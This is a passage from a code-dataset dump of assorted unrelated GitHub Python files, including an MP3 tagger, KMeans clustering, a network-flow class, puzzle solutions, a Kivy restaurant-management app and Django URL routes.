__FOREGROUND_DIFF_THRESH__\n\tforeground = current_frame.copy()\n\tmask2 = np.invert(mask)\n\tforeground[mask2] = [255,255,255]\n\toutput = np.concatenate((current_frame, foreground), axis=1).astype('uint8')\n\tcv2.imshow(\"Output\", output)\n\n\tkey = cv2.waitKey(10) & 0xFF\n\tif key == ord('q'): break\n\ncap.release()\ncv2.destroyAllWindows()\n\n","repo_name":"gordian-eggo/project_pancit_canton","sub_path":"09/ruz_gutierrez_Ex09.py","file_name":"ruz_gutierrez_Ex09.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"11905452548","text":"import mutagen\nfrom mutagen.id3 import ID3, TIT2, TPE1, TALB, TCON, TYER, TRCK, APIC, TPE2\nfrom mutagen.mp3 import MP3\nimport urllib\n\nfrom tagger.discogs import retrieve_track_number\nfrom tagger.lyrics import search_lyrics\n\ndef create_tag(filename, year, artist, album, title, genre, track_no, cover, album_artist):\n print(filename)\n if genre is None:\n genre = 'Electronic'\n audio = MP3(filename, ID3=ID3)\n audio.delete()\n if audio.tags is None:\n audio.tags = ID3()\n audio.tags.version = (2, 4, 0)\n\n # add title tag\n audio.tags.add(TIT2(encoding=3, text=title))\n\n # add artist tag\n audio.tags.add(TPE1(encoding=3, text=artist))\n\n # add album tag\n audio.tags.add(TALB(encoding=3, text=album))\n\n # add year tag\n audio.tags.add(TYER(encoding=3, text=str(year)))\n\n # add genre tag\n audio.tags.add(TCON(encoding=3, text=genre))\n\n # add album artist tag\n if album_artist is None:\n album_artist = artist\n audio.tags.add(TPE2(encoding=3, text=album_artist))\n\n # add track number tag\n if track_no is None:\n track_no = retrieve_track_number(album, artist, title)\n audio.tags.add(TRCK(encoding=3, text=str(track_no)))\n\n lyrics_text = search_lyrics(title, artist)\n if lyrics_text is not None:\n\n # Create the USLT tag with the lyrics text and language\n lyrics = mutagen.id3.USLT(encoding=3, lang=u'eng', desc=u'', text=lyrics_text)\n audio.tags.add(lyrics)\n\n response = urllib.request.urlopen(cover)\n content = response.read()\n\n audio.save()\n\n audio = MP3(filename, ID3=ID3)\n # Create an APIC frame with the image data\n apic = APIC(\n encoding=3, # 3 is for UTF-8\n mime='image/jpeg',\n type=3, # 3 is for the cover image\n desc='Cover',\n data=content\n )\n\n # Add the APIC frame to the ID3 tags\n audio.tags.add(apic)\n\n audio.save()\n\n\ndef update_cover(filename, cover):\n image_uri = cover\n\n # Download the image data\n\n response = urllib.request.urlopen(image_uri)\n content = response.read()\n\n audio = MP3(filename, ID3=ID3)\n # Create an APIC frame with the image data\n apic = APIC(\n encoding=3, # 3 is for UTF-8\n mime='image/jpeg',\n type=3, # 3 is for the cover image\n desc='Cover',\n data=content\n )\n\n # Add the APIC frame to the ID3 tags\n audio.tags.add(apic)\n\n # Save the changes to the music file\n audio.save()\n","repo_name":"vonfreiren/music-data-extensions","sub_path":"tagger/tags.py","file_name":"tags.py","file_ext":"py","file_size_in_byte":2451,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"3171880736","text":"import numpy as np\n\nimport logging\nfrom traindata_extractor.general.common import get_reverse_dict\nfrom traindata_extractor.general.common import data_shuffle_col\nfrom traindata_extractor.general.Vividict import Vividict\nfrom traindata_extractor.general.feat_calc import feat_calc\nfrom traindata_extractor.general.common import (\n load_json,\n add_root_path,\n delete_999_row,\n delete_nan_row,\n)\n\n\"\"\"\ntemporary useless in this project\n\"\"\"\n\n\nclass TrainDataProcessor:\n my_logger = logging.getLogger(__qualname__)\n\n def __init__(\n self,\n process_dict: dict,\n aux_dic: dict,\n npy_path_list: list,\n read_order_list: list,\n ):\n \"\"\"\n Function:\n initialize TrainDataProcessor class\n Input:\n npy_path_list: a list contains the paths of npy files.\n raster_paths:a 2-layered dict contains the raster files\n as the model input.\n like this:\n {\"sensor-1\":{\"band-1\":\"band path\",\n \"band-2\":\"band path\"],\n ...}\n \"sensor-2\":{\"band-1\":\"band path\",\n \"band-2\":\"band path\",\n ...}\n }\n label_dict: a dictionary contains label of each ground-truth\n polygon, a field named \"label\" is necessary.\n bandmath_list: a 2-layered list contains the band math info,\n like this:\n [[\"addition\",0,1],\n [\"division\",2,3],...]\n read_order_list: 2d list of read order\n \"\"\"\n # set class members\n self.npy_path_list = npy_path_list\n\n img_prepro_dict = load_json(process_dict[\"img_pro_dict\"])\n shp_prepro_dict = load_json(process_dict[\"shp_reproj_dict\"])\n img_prepro_dict, shp_prepro_dict = add_root_path(\n img_prepro_dict, shp_prepro_dict\n )\n self.work_path = process_dict[\"work_path\"]\n self.label_dict = aux_dic[\"label_dict\"]\n self.raster_path_dict = img_prepro_dict\n self.command = process_dict[\"command\"]\n self.bandmath_list = self.command[\"band_math\"]\n self.feat_list = [f[1] for f in read_order_list]\n self.read_order_list = read_order_list\n self.n_files = len(self.npy_path_list)\n self.calc_symbols = {\n \"addition\": \"+\",\n \"subtraction\": \"-\",\n \"multiplication\": \"*\",\n \"division\": \"/\",\n } # zzz todo: add set_calc_symbols func();\n\n # get the reversed dict\n self.label_dict_R = get_reverse_dict(self.label_dict)\n\n # load first npy\n self.data = np.load(self.npy_path_list[0]).item()\n\n # statistic the dict in npy\n self.statistic_data()\n\n # set a default relabel dict for classification\n self.set_relabel_dict()\n\n # set a default proportion dict\n self.set_proportion_dict()\n\n # set feature dictionary using feat_list\n self.feat_dict = {}\n n = 0\n for l in self.feat_list:\n self.feat_dict[l] = n\n n += 1\n\n def set_label_dicts(self, dic: dict):\n \"\"\"\n Function:\n set self.__label_dict and label_dict_R\n if you have a new label-dictionary.\n \"\"\"\n self.label_dict = dic\n self.label_dict_R = get_reverse_dict(dic)\n self.my_logger.info(\"label dictionary updated!~\")\n\n def statistic_data(self):\n \"\"\"\n Function:\n statistic self.data, get level 1,2,3 keys in kxl list.\n and set them as class members.\n self.feat_dict is dict of feature name and feature colomn index\n in future ndarrays.\n \"\"\"\n k1l = []\n k2l = []\n k3l = []\n feat_dic = {}\n k3n = 0\n for k1 in self.data.keys():\n k1l.append(k1)\n for k2 in self.raster_path_dict.keys():\n k2l.append(k2)\n for k3 in self.raster_path_dict[k2].keys():\n k3l.append(k3)\n feat_dic[k3] = k3n\n k3n += 1\n self.k1_list = k1l\n self.k2_list = k2l\n self.k3_list = k3l\n # self.feat_dict = feat_dic\n n_pix = 0\n for k1 in self.data.keys():\n n_pix += len(self.data[k1][k2l[0]][k3l[0]])\n self.n_pixel = n_pix\n\n def set_relabel_dict_bylist(self, list1: list):\n \"\"\"\n Function:\n set new_label_dict by a given list $list1\n $list1 contains the labels to be set to 1\n \"\"\"\n for key in self.new_label_dict.keys():\n self.new_label_dict[key] = 0\n for items in list1:\n self.new_label_dict[items] = 1\n self.my_logger.info(\"new label dictionary is set!\")\n\n def set_relabel_dict(self, new_dic: dict = None):\n \"\"\"\n Function:\n set new_label_dict by a given dict $new_dic\n re-label means combine original class into several new classes,\n and set some new label to the combined classes.\n \"\"\"\n if new_dic is None: # default new dict, only palm is 1\n new_dic = self.label_dict_R\n for lab in new_dic.keys():\n new_dic[lab] = 0\n if lab == \"palm\":\n new_dic[lab] = 1\n self.new_label_dict = new_dic\n self.my_logger.info(\"default re-label-dict is set\")\n else:\n self.new_label_dict = new_dic\n self.my_logger.info(\"new re-label-dict is set\")\n\n def set_proportion_dict(self, new_dic: dict = None) -> (np.array, dict):\n \"\"\"\n Function:\n set proportion_dict by a given dict new_dic\n proportion_dict has the same keys as self.label_dict,\n it stores the proportion of each class when applying them\n to classifier. this will help control some class has\n too large samples that may cause unexpected training results.\n \"\"\"\n if new_dic is None: # default new dict, all proportion is 1 (no sampling)\n new_dic = self.label_dict_R\n for lab in new_dic.keys():\n new_dic[lab] = 1\n self.proportion_dict = new_dic\n self.my_logger.info(\"default proportion-dict is set\")\n else:\n self.proportion_dict = new_dic\n self.my_logger.info(\"new proportion-dict is set\")\n\n def get_feat_name(self, bm_list: list) -> str:\n \"\"\"\n get a feature name string from bandmath command list\n \"\"\"\n b1 = bm_list[1] # band 1 name\n b2 = bm_list[2] # band 2 name\n if b1.find(\"+\") or b1.find(\"-\"):\n b1 = \"(\" + b1 + \")\"\n if b2.find(\"+\") or b2.find(\"-\"):\n b2 = \"(\" + b2 + \")\"\n\n feat_str = b1 + self.calc_symbols[bm_list[0]] + b2\n return feat_str\n\n def dict_to_nparray_new(self) -> (np.ndarray, dict):\n \"\"\"\n Function:\n get nparray-like traindata from dict\n first seperate each category into a old-version-like dict,\n then adjust the category amount by a certain dict.\n Input:\n deal with only class members.\n Output:\n array: a ndarray contains all the pixels and all the features and\n all the new label numbers, like this:\n feat1 feat2 feat3 ... label\n ---------------array contains below----------------------\n xxx.xx xxx.xx xxx.xx ... 1\n xxx.xx xxx.xx xxx.xx ... 0\n xxx.xx xxx.xx xxx.xx ... 0\n xxx.xx xxx.xx xxx.xx ... 1\n xxx.xx xxx.xx xxx.xx ... 0\n\n dict: a dictionary contains feature keys and corresponding colomn\n indices.\n\n ###### NOTICE!!! ######\n before the band math, array is transposed and all processes\n is based on the transposed array!\n \"\"\"\n\n fn = len(self.feat_list) # feature number\n pn = self.n_pixel # sample points(pixels) number\n array = np.zeros((fn + 1, pn)) # feature number + 1 label row\n array[:, :] = -999 # np.nan\n cate_dic = Vividict()\n for c in self.label_dict_R: # category\n for f in self.feat_list: # feature list\n cate_dic[c][f] = []\n cate_dic[c][\"label\"] = []\n # loop npy dic\n for k1 in self.data.keys():\n cate = self.data[k1][\"category\"]\n for ro in self.read_order_list:\n k2 = ro[0]\n k3 = ro[1]\n sam = self.data[k1][k2][k3]\n cate_dic[cate][k3] = np.hstack((cate_dic[cate][k3], sam))\n lab = np.zeros_like(sam)\n lab[:] = self.label_dict_R[cate]\n # change labels to newlabel according to newlabel_dict\n lab[:] = self.new_label_dict[cate]\n cate_dic[cate][\"label\"] = np.hstack((cate_dic[cate][\"label\"], lab))\n\n # print length of each item\n all_sam_num = 0\n for c in self.label_dict_R: # category\n for f in self.feat_list: # feature\n print(c, \":\", f, \":\", len(cate_dic[c][f]))\n all_sam_num += len(cate_dic[c][f])\n\n if all_sam_num == 0:\n self.my_logger.info(\"dict_to_nparray_new(): no traindata found!\")\n return None\n\n print(\"---resampling---\")\n array = np.array([])\n for cate1 in cate_dic.keys():\n cate_feat = np.array([])\n pp = self.proportion_dict[cate1] # proportion\n assert 0 < pp <= 1, \"proportion must be in (0,1]\"\n for feat1 in cate_dic[cate1].keys():\n if len(cate_dic[cate1][feat1]) == 0:\n continue\n if cate_feat.size > 0:\n cate_feat = np.vstack([cate_feat, cate_dic[cate1][feat1]])\n else:\n cate_feat = cate_dic[cate1][feat1]\n n_sam = len(cate_dic[cate1][feat1])\n # data shuffle and sampling\n if len(cate_dic[cate1][feat1]) == 0:\n continue\n cate_feat = data_shuffle_col(cate_feat)\n s_sam = int(n_sam * pp)\n cate_feat = cate_feat[:, 0:s_sam]\n print(\"%s : %d\", cate1, len(cate_feat[0, :]))\n if array.size > 0:\n array = np.hstack([array, cate_feat])\n else:\n array = cate_feat\n\n self.my_logger.info(\"array shuffling...\")\n array = data_shuffle_col(array)\n array = array.swapaxes(1, 0)\n\n # band math\n n_feat = len(self.feat_dict)\n if self.bandmath_list is not None: # run band math\n self.my_logger.info(\"applying band math ......\")\n for bm in self.bandmath_list: # for each band math command\n if type(bm) is list:\n self.my_logger.info(\n \"calculating \"\n + bm[0]\n + \" of bands: {} , {}\".format(bm[1], bm[2])\n )\n array = feat_calc(\n array, self.feat_dict[bm[1]], self.feat_dict[bm[2]], bm[0]\n )\n n_feat += 1\n feat_str = self.get_feat_name(bm)\n self.feat_dict[feat_str] = n_feat - 1\n else:\n self.my_logger.error(\"wrong bandmath_list format!\")\n return None, None\n else:\n self.my_logger.error(\"bandmath_list is empty!\")\n return None, None\n\n array = delete_999_row(array)\n array = delete_nan_row(array)\n self.data = array\n\n td_name = self.work_path + \"td_all_label.npy\"\n np.save(td_name, self.data)\n self.my_logger.info(\"{}\".format(self.feat_dict))\n return array, self.feat_dict\n\n def multi_dicts_to_nparray(self) -> np.ndarray:\n \"\"\"\n Function:\n get nparray-like traindata from self.npy_path_list\n Input:\n deal with only class members.\n Output:\n array: a ndarray contains all the pixels and all the features and\n all the new label numbers\n \"\"\"\n if self.n_files < 2:\n self.my_logger.info(\n \"there is only one file in list, execute single version instead\"\n )\n td_all, feat_dic0 = self.dict_to_nparray_new()\n return True\n\n td_all = np.array([])\n # loop each file in list\n for nf in self.npy_path_list:\n self.data = np.load(nf)\n self.statistic_data()\n td, feat_dic0 = self.dict_to_nparray_new()\n td_all = np.vstack([td_all, td])\n\n return td_all\n","repo_name":"zhougongqi/traindata_extractor","sub_path":"ground_truth/TrainDataProcessor.py","file_name":"TrainDataProcessor.py","file_ext":"py","file_size_in_byte":12898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"27882922912","text":"# -*- coding=utf-8 -*-\r\n# \r\nimport numpy as np\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn.cluster import DBSCAN\r\nimport matplotlib.pyplot as plt\r\nfrom collections import Counter\r\nimport pandas as pd\r\n\r\n# 确定最佳k-means 聚类数量\r\n# 参考\r\n# https://blog.csdn.net/qq_15738501/article/details/79036255\r\ndef find_best_k(arr):\r\n\tarr = df.values\r\n\tSSE = []\r\n\tfor k in range(1, 11):\r\n\t\testimator = KMeans(n_clusters = k)\r\n\t\testimator.fit(arr)\r\n\t\tprint(\"finish kmeans round: %d\"%k)\r\n\t\tSSE.append(estimator.inertia_)\r\n\r\n\tX = range(1, 11)\r\n\tplt.xlabel('k')\r\n\tplt.ylabel('SSE')\r\n\tplt.plot(X,SSE,'o-')\r\n\tplt.savefig('find-best-k.png', dpi=120)\r\n\tplt.show()\r\n\r\n# kmeans聚类\r\ndef cluster_kmeans(df, k):\r\n\tarr = df.values\r\n\tprint(\"start kmeans cluster... k = %d\" %k)\r\n\tkm = KMeans(n_clusters = k, random_state = 0)\r\n\tkm.fit(arr)\r\n\r\n\tprint(\"kmeans done. k = %d\" %k)\r\n\tprint_cluster_num(km.labels_)\r\n\r\n\torigin_df = pd.read_csv('./processed-data/user-profile-behavior.csv', index_col = 'user_id')\r\n\tres_df = pd.concat([origin_df, pd.Series(km.labels_, index = origin_df.index)], axis = 1)\r\n\tres_df.columns = list(origin_df.columns) + [u'cluster_type'] #重命名表头\r\n\tres_df.to_csv('./processed-data/user-profile3-behavior-cluster.csv')\r\n\tprint(\"kmeans result saved\")\r\n\r\n# 打印出各分类标签的数量,以辅助确定t-sne perpelexity参数\r\ndef print_cluster_num(label):\r\n\tc = Counter(label.flatten())\r\n\tprint(len(c.keys()))\r\n\tprint(c)\r\n\r\nif(__name__ == '__main__'):\r\n\tdf = pd.read_csv('./processed-data/user-profile3-behavior-standardized.csv', index_col = 'user_id')\r\n\tprint(\"load standardized success.\")\r\n\t# find_best_k(df)\r\n\tcluster_kmeans(df, 5)\r\n\r\n","repo_name":"Piny-Lyo/MulUBA","sub_path":"data-process/cluster/cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"13994630294","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import unicode_literals\nimport importlib\nimport os, os.path\nfrom py_privatekonomi.utilities import common\nfrom py_privatekonomi.core.factories.account_formatter_factory import AccountFormatterFactory\nfrom py_privatekonomi.core.factories.account_parser_factory import AccountParserFactory\nfrom py_privatekonomi.core.formatters.account_formatter import AccountFormatter\nfrom py_privatekonomi.core.formatters.swedbank_formatter import SwedbankFormatter\nfrom py_privatekonomi.core.formatters.avanza_formatter import AvanzaFormatter\nfrom py_privatekonomi.core.formatters.nordnet_formatter import NordnetFormatter\nfrom py_privatekonomi.core.parsers.regex_parser import RegexParser\nfrom py_privatekonomi.core.parsers.swedbank_parser import SwedbankParser\nfrom py_privatekonomi.core.parsers.avanza_parser import AvanzaParser\nfrom py_privatekonomi.core.parsers.nordnet_parser import NordnetParser\nfrom py_privatekonomi.core.config import readConfig\nfrom py_privatekonomi.core.mappers.economy_mapper import EconomyMapper\n\ndef __load_module(name, folder):\n safe_module_name = common.path_leaf(name)\n if not safe_module_name.startswith(\"py_privatekonomi.core.%s\" % folder):\n safe_module_name.replace(\".\", \"\")\n safe_module_name = \"%s.%s\" % (folder, safe_module_name)\n safe_module = importlib.import_module(\"%s\" % safe_module_name)\n return safe_module\n\ndef load_app(app_name, sources, parser_name = None, formatter_name = None, persist = False):\n _core = load_core()\n _sources = load_sources(sources)\n app = {\n 'module' : __load_module(app_name, \"apps\"),\n 'parser' : load_parser(parser_name, _core['factories']['parsers']['account_parser_factory']),\n 'formatter' : load_formatter(formatter_name, _core['factories']['formatters']['account_formatter_factory']),\n 'sources' : _sources,\n 'persist' : persist\n }\n app['core'] = _core\n return app\n\ndef load_core():\n account_formatter_factories = load_factory({\n 'swedbank' : SwedbankFormatter,\n 'avanza' : AvanzaFormatter,\n 'nordnet' : NordnetFormatter\n }, AccountFormatterFactory)\n\n account_parser_factories = load_factory({\n 'swedbank' : SwedbankParser,\n 'avanza' : AvanzaParser,\n 'nordnet' : NordnetParser\n }, AccountParserFactory)\n\n core = {\n 'factories' : {\n 'formatters' : {\n 'account_formatter_factory' : account_formatter_factories\n },\n 'parsers' : {\n 'account_parser_factory' : account_parser_factories\n }\n }\n }\n return core\n\ndef load_factory(names, factory):\n _factory = factory()\n for name in names:\n _factory.set(name, names[name])\n return _factory\n\ndef load_formatter(name, factory):\n return factory.create(name)\n\ndef load_parser(name, factory):\n return factory.create(name)\n\ndef load_sources(source_name):\n if common.is_list(source_name):\n return source_name\n if source_name.endswith(\".ini\"):\n source_name = source_name.replace(\".ini\", \"\")\n source = common.as_obj(readConfig(source_name, \"Source\"))\n if hasattr(source, 'exact_match'):\n return [source.exact_match]\n else:\n candidate_files = [f for f in os.listdir(source.dir) if os.path.isfile(os.path.join(source.dir, f))]\n if hasattr(source, 'suffix'):\n candidate_files = [x for x in candidate_files if x.endswith(source.suffix)]\n if hasattr(source, 'prefix'):\n candidate_files = [x for x in candidate_files if x.startswith(source.prefix)]\n if hasattr(source, 'filename_like'):\n candidate_files = [x for x in candidate_files if source.filename_like in x]\n files = [os.path.join(source.dir, x) for x in candidate_files]\n return files\n else:\n return [source_name]\n\ndef load_models(model_names):\n models = {}\n model_collection = [common.camelcase_to_underscore(model) for model in model_names]\n for table_name in model_collection:\n module = __load_module(table_name, \"py_privatekonomi.core.models\")\n model_name = common.underscore_to_camelcase(table_name)\n type_ = getattr(module, model_name)\n models[table_name] = {\n 'type' : type_,\n 'table_name' : table_name,\n 'model_name' : model_name\n }\n return models\n\ndef load_customizations(org_name, raw_models = None, safe=False):\n path = \"py_privatekonomi.core.customizations\"\n module = None\n if safe is True:\n try:\n module = __load_module(org_name, path)\n except ImportError:\n return {}\n if module is None:\n module = __load_module(org_name, path)\n if raw_models is None:\n raw_models = load_models(EconomyMapper.getModelNames())\n customizations = module.getCustomizations(raw_models)\n return customizations\n","repo_name":"nilsFK/py-privatekonomi","sub_path":"py_privatekonomi/core/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":5019,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"71229838355","text":"from collections import deque\n\n\nclass NetworkFlow:\n def __init__(self, N, capacity):\n self.N = N\n self.capacity = capacity\n\n def bfs(self, flow, source, sink):\n parent = [-1 for _ in range(self.N)]\n q = deque()\n parent[source] = source\n q.append(source)\n while q and parent[sink] == -1:\n u = q.popleft()\n for v in range(self.N):\n if self.capacity[u][v] - flow[u][v] > 0 and parent[v] == -1:\n q.append(v)\n parent[v] = u\n return parent\n\n def max_flow(self, source, sink):\n flow = [[0 for _ in range(self.N)] for _ in range(self.N)]\n total_flow = 0\n while True:\n parent = self.bfs(flow, source, sink)\n if parent[sink] == -1:\n break\n amount = int(1e9)\n p = sink\n while p != source:\n amount = min(amount, self.capacity[parent[p]][p] - flow[parent[p]][p])\n p = parent[p]\n p = sink\n while p != source:\n flow[parent[p]][p] += amount\n flow[p][parent[p]] -= amount\n p = parent[p]\n total_flow += amount\n return total_flow\n","repo_name":"imhyo/codejam","sub_path":"network_flow.py","file_name":"network_flow.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"84"} +{"seq_id":"39719458133","text":"def solution(s):\n answer = []\n tmp = 0\n str = []\n t = []\n # 숫자 구분 ( \"{\" , \",\" , \"}\" 제외 시키기)\n for i in range(1, len(s)-1):\n if s[i] == \"{\":\n tmp = i+1\n continue\n elif s[i] == ',':\n continue\n elif s[i] == \"}\":\n str.append(s[tmp:i].split(\",\"))\n t.clear()\n tmp += 1\n else:\n t.append(s[i])\n # 길이로 구분\n str.sort(key=lambda x:len(x))\n len_num = len(str)\n\n # 구분된 부��에서 순서대로 위치 맞춰주기\n for i in range(len_num-1):\n for j in range(i+1):\n index = str[i + 1].index(str[j][j])\n if index == j:\n continue\n else:\n temp = str[i + 1][j]\n str[i + 1][j] = str[i + 1][index]\n str[i + 1][index] = temp\n # 가장 앞 부분만 따서 오기 \n for i in range(len_num):\n answer.append(int(str[i][i]))\n\n\n return answer\n\n# from collections import Counter\n# def solution(s):\n# new_s = [sss.replace('{','').replace('}','') for sss in s.split(',')]\n# print(Counter(new_s).items())\n# return [int(c[0]) for c in sorted(Counter(new_s).items(), key = lambda x: x[1],reverse=True )]\n\nprint(solution(\"{{1,2,3},{1,2},{4,1,2,3},{2}}\"))\n","repo_name":"Wintersoldje/Algorithm","sub_path":"Programmers/Kakao_Tuple/Programmers_Kakao_Tuple.py","file_name":"Programmers_Kakao_Tuple.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"42452605661","text":"import os\nfrom enum import Enum\nfrom ast import literal_eval\n\nclass Result(Enum):\n VALID = 1\n INVALID = 2\n UNKNOWN = 3\n\nf = open(os.path.join(os.path.dirname(__file__), \"input.txt\"))\n\ngroups = f.read().split(\"\\n\\n\")\n\ndef validate_packet(first, second):\n i = 0\n while i < min(len(first), len(second)):\n l, r = first[i], second[i]\n if type(l) == int and type(r) == int:\n if l < r:\n return Result.VALID\n if l > r:\n return Result.INVALID\n i += 1\n elif type(l) == list and type(r) == list:\n result = validate_packet(l, r)\n if result != Result.UNKNOWN:\n return result\n i += 1\n else:\n if type(l) == int:\n first[i] = [l]\n else:\n second[i] = [r]\n if len(first) == len(second):\n return Result.UNKNOWN\n else:\n return Result.VALID if len(first) < len(second) else Result.INVALID\n\nvalid_indices = []\nfor i, g in enumerate(groups, 1):\n first, second = g.splitlines()\n first, second = literal_eval(first), literal_eval(second)\n if validate_packet(first, second) == Result.VALID:\n valid_indices.append(i)\n\n# answer: 5717\nprint(sum(valid_indices))\n","repo_name":"feefs/ps","sub_path":"advent-of-code/2022/13/solution1.py","file_name":"solution1.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"73231762514","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun May 10 21:09:09 2020\r\n\r\n@author: denis\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport seaborn as sb\r\nimport matplotlib.pyplot as plt\r\n\r\n# data = input('Please give the file name you wish to use: ')\r\n# data = 'GPUZSensorLog2.txt' # development data set\r\nfile_name = input('Please give the file name you wish to use: ')\r\nworkload = input('Please outline use case: ')\r\n\r\n\r\nf = open(file_name + '.txt','r+')\r\ndata = f.read()\r\n# data.encode('utf-8').strip()\r\n# f.write(data)\r\n\r\n\r\nd3 = data.encode(\"ascii\", \"ignore\")\r\ndata2 = d3.decode()\r\n\r\nf2 = open('work.txt','w')\r\nf2.write(data2)\r\nf2.close()\r\n\r\ndf = pd.read_csv('work.txt')\r\n# sb.lineplot(df.index,df[])\r\n# sb.lineplot(df.index,[df[' GPU Temperature [C] '],df[' CPU Temperature [C] ']])\r\ndf[[' GPU Temperature [C] ',' CPU Temperature [C] ']].plot()\r\nplt.ylabel('Hardware temperature')\r\nplt.title(f'{workload}')\r\nplt.legend()\r\nsb.jointplot(df[' GPU Temperature [C] '],df[' CPU Temperature [C] '],kind='hex')\r\nsb.jointplot(df[' GPU Load [%] '],df[' GPU Temperature [C] '],kind='hex')\r\nsb.jointplot(df[' GPU Load [%] '],df[' Power Consumption (W) [W] '],kind='hex')\r\n","repo_name":"BigBearZab/PC_monitoring","sub_path":"GPU-Z_quick_interpreter.py","file_name":"GPU-Z_quick_interpreter.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"5582631923","text":"from ting_file_management.file_management import txt_importer\nimport sys\n\n# from ting_file_management.queue import Queue\n\n\ndef process(path_file, instance):\n lines = txt_importer(path_file)\n data_info = {\n \"nome_do_arquivo\": path_file,\n \"qtd_linhas\": len(lines),\n \"linhas_do_arquivo\": lines,\n }\n if len(instance) > 0:\n file_is_queued = False\n for index in range(0, len(instance)):\n item = instance.search(index)\n if item[\"nome_do_arquivo\"] == data_info[\"nome_do_arquivo\"]:\n file_is_queued = True\n # como \"parar\" o for\n if not file_is_queued:\n instance.enqueue(data_info)\n else:\n instance.enqueue(data_info)\n\n sys.stdout.write(str(data_info))\n\n\ndef remove(instance):\n if len(instance) < 1:\n sys.stdout.write(\"Não há elementos\\n\")\n else:\n item = instance.search(len(instance) - 1)\n path_file = item[\"nome_do_arquivo\"]\n instance.dequeue()\n sys.stdout.write(f\"Arquivo {path_file} removido com sucesso\\n\")\n\n\ndef file_metadata(instance, position):\n try:\n item = instance.search(position)\n sys.stdout.write(str(item))\n except IndexError:\n sys.stderr.write(\"Posição inválida\")\n","repo_name":"flpnascto/ting","sub_path":"ting_file_management/file_process.py","file_name":"file_process.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"16779041296","text":"\"\"\"\nfilename: app.py\nauthor: alexbozhinov\ncreated: 05.02.2023\npurpose: initializing the main window, initializing the app, initializing the database\n\"\"\"\n\nfrom kivy.app import App\nfrom kivy.core.window import Window\nfrom kivy.lang import Builder\nfrom kivy.uix.boxlayout import BoxLayout\nimport constants\nfrom controller.employees.chefs_controller import ChefsController\nfrom controller.employees.managers_controller import ManagersController\nfrom controller.employees.waiters_controller import WaitersController\nfrom database.db import DB\nfrom view.login.login import LoginWindow\nfrom view.login.welcome import WelcomeWindow\nfrom view.main_employees_screens.chef_main_screen import ChefMainWindow\nfrom view.main_employees_screens.manager_main_screen import ManagerMainWindow\nfrom view.main_employees_screens.waiter_main_screen import WaiterMainWindow\n\nBuilder.load_file('app.kv')\n\n# database initializing\ndb = DB()\ndb.create_database()\n\n\"\"\"\nThe main window of the app, managed by kivy ScreenManager\n\"\"\"\n\n\nclass MainWindow(BoxLayout):\n chefs_controller = ChefsController()\n waiters_controller = WaitersController()\n managers_controller = ManagersController()\n\n welcome_screen = WelcomeWindow()\n login_screen = LoginWindow(chefs_controller, waiters_controller, managers_controller)\n chef_main_screen = ChefMainWindow(chefs_controller)\n waiter_main_screen = WaiterMainWindow(waiters_controller)\n manager_main_screen = ManagerMainWindow(managers_controller)\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.ids.screen_welcome.add_widget(self.welcome_screen)\n self.ids.screen_login.add_widget(self.login_screen)\n self.ids.screen_chef_main.add_widget(self.chef_main_screen)\n self.ids.screen_waiter_main.add_widget(self.waiter_main_screen)\n self.ids.screen_manager_main.add_widget(self.manager_main_screen)\n\n def chef_entered(self):\n print('Chef entered')\n self.chef_main_screen.chef_entered()\n\n def waiter_entered(self):\n print('Waiter entered')\n self.waiter_main_screen.waiter_entered()\n\n def manager_entered(self):\n print('Manager entered')\n self.manager_main_screen.manager_entered()\n\n\n\"\"\"\nThe app main class\n\"\"\"\n\n\nclass RMS(App):\n images_store = constants.IMAGES_SOURCE\n\n def build(self):\n self.icon = constants.IMAGES_SOURCE + 'RMS_logo.png'\n Window.clearcolor = (240 / 255.0, 230 / 255.0, 170 / 255.0, 1)\n return MainWindow()\n\n\n# start point of the app\nif __name__ == \"__main__\":\n RMS().run()\n","repo_name":"alexbozhinov/Restaurant-Management-System","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"27090696305","text":"from django.conf.urls import url\nfrom . import views\nfrom .views import PostListView\n\n\nurlpatterns = [\n # post views\n url(r'^$', views.post_list, name='post_list'),\n url(r'^tag/(?P[-\\w]+)/$', views.post_list, name='post_list_by_tag'),\n url(r'^share/(?P\\d+)/$', views.post_share, name='post_share'),\n url(r'^post/(?P.*)/$',views.post_detail,name='post_detail'),\n url(r'^search/',views.post_search,name='post_search')\n\n]\n","repo_name":"845240981/webapp","sub_path":"blog/url.py","file_name":"url.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"12079196966","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nfrom dateutil.parser import parse\nfrom dateutil.tz import gettz\nfrom 